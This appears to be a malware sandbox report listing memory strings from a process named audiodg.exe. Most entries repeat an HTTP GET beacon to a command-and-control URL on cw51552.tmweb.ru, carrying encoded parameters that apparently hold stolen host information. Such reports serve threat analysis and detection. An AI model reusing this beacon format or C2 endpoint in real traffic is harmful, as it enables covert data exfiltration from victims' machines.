Source: audiodg.exe, 00000012.00000002.909810260.000001D414F3A000.00000004.00000001.sdmp	Binary or memory string: http://cw51552.tmweb.ru/pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN@
Source: audiodg.exe, 00000012.00000002.914355080.000001D42D8A0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: audiodg.exe, 00000012.00000002.911120912.000001D4152E4000.00000004.00000001.sdmp	Binary or memory string: 0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye
Source: audiodg.exe, 00000012.00000002.909876538.000001D414F64000.00000004.00000001.sdmp	Binary or memory string: http://cw51552.tmweb.ru/pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN@
Source: audiodg.exe, 00000012.00000002.909976728.000001D414FA4000.00000004.00000001.sdmp	Binary or memory string: 0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye
Source: audiodg.exe, 00000012.00000002.909976728.000001D414FA4000.00000004.00000001.sdmp	Binary or memory string: http://cw51552.tmweb.ru/pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN@
Source: audiodg.exe, 00000012.00000002.911120912.000001D4152E4000.00000004.00000001.sdmp	Binary or memory string: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1
Source: audiodg.exe, 00000012.00000002.913736390.000001D42D7BE000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: audiodg.exe, 00000012.00000002.911722317.000001D415362000.00000004.00000001.sdmp	Binary or memory string: http://cw51552.tmweb.ru/pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN
Source: audiodg.exe, 00000012.00000002.911120912.000001D4152E4000.00000004.00000001.sdmp	Binary or memory string: http://cw51552.tmweb.ru/pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN
Source: audiodg.exe, 00000012.00000002.911120912.000001D4152E4000.00000004.00000001.sdmp	Binary or memory string: /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN
Source: audiodg.exe, 00000012.00000002.909976728.000001D414FA4000.00000004.00000001.sdmp	Binary or memory string: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1
Source: audiodg.exe, 00000012.00000002.909976728.000001D414FA4000.00000004.00000001.sdmp	Binary or memory string: ?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN
Source: audiodg.exe, 00000012.00000002.911120912.000001D4152E4000.00000004.00000001.sdmp	Binary or memory string: http://cw51552.tmweb.ru/pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN
Source: audiodg.exe, 00000012.00000002.914355080.000001D42D8A0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: audiodg.exe, 00000012.00000002.911120912.000001D4152E4000.00000004.00000001.sdmp	Binary or memory string: ?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2I